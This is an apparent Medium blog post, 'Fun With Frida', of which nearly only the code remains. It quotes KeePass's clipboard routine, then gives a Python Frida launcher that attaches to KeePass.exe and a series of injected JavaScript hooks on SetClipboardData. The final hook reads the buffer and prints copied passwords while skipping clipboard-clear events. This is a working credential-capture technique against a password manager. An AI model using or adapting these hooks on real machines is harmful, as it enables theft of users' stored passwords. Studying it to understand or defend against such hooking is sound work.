Fun With Frida

James
James
Jun 2 · 7 min read
private static bool SetDataW(uint uFormat, byte[] pbData){UIntPtr pSize = new UIntPtr((uint)pbData.Length);IntPtr h = NativeMethods.GlobalAlloc(NativeMethods.GHND, pSize);if(h == IntPtr.Zero) { Debug.Assert(false); return false; }Debug.Assert(NativeMethods.GlobalSize(h).ToUInt64() >=(ulong)pbData.Length); // Might be largerIntPtr pMem = NativeMethods.GlobalLock(h);if(pMem == IntPtr.Zero){Debug.Assert(false);NativeMethods.GlobalFree(h);return false;}Marshal.Copy(pbData, 0, pMem, pbData.Length);NativeMethods.GlobalUnlock(h); // May return false on successif(NativeMethods.SetClipboardData(uFormat, h) == IntPtr.Zero){Debug.Assert(false);NativeMethods.GlobalFree(h);return false;}return true;}
var str = System.Text.Encoding.Default.GetString(pbData);
import frida
import sys
import codecs
def on_message(message, data):
if message['type'] == 'send':
print(message['payload'])
elif message['type'] == 'error':
print(message['stack'])
else:
print(message)
try:
session = frida.attach("KeePass.exe")
print ("[+] Process Attached")
except Exception as e:
print (f"Error => {e}")
sys.exit(0)
with codecs.open('./Inject.js', 'r', 'utf-8') as f:
source = f.read()
script = session.create_script(source)
script.on('message', on_message)
script.load()
try:
while True:
pass
except KeyboardInterrupt:
session.detach()
sys.exit(0)
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")
// Attach a hook to the native pointer
Interceptor.attach(user32_SetClipboardData, {
onEnter: function (args, state) {
console.log("[+] KeePass called SetClipboardData");
},

onLeave: function (retval) {
}
});
// Get native pointer to MessageBoxA
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

// Attach a hook to the native pointer
Interceptor.attach(user32_SetClipboardData, {
onEnter: function (args, state) {
console.log("[+] KeePass called SetClipboardData");
var ptr = args[1].readPointer().readByteArray(32);
console.log(ptr)
},

onLeave: function (retval) {
}
});
// Get native pointer to MessageBoxA
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")
// Attach a hook to the native pointer
Interceptor.attach(user32_SetClipboardData, {
onEnter: function (args, state) {
console.log("[+] KeePass called SetClipboardData");
var ptr = args[1].readPointer().readByteArray(32);
var str = ab2str(ptr);
if(!str.startsWith("--")){
console.log("[+] Captured Data!")
console.log(str);
}
else{
console.log("[+] Clipboard was cleared")
}
},

onLeave: function (retval) {
}
});
function ab2str(buf){
return String.fromCharCode.apply(null, new Uint16Array(buf));
}

James

Written by

James

Purveyor of fine, handcrafted, artisanal cybers.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade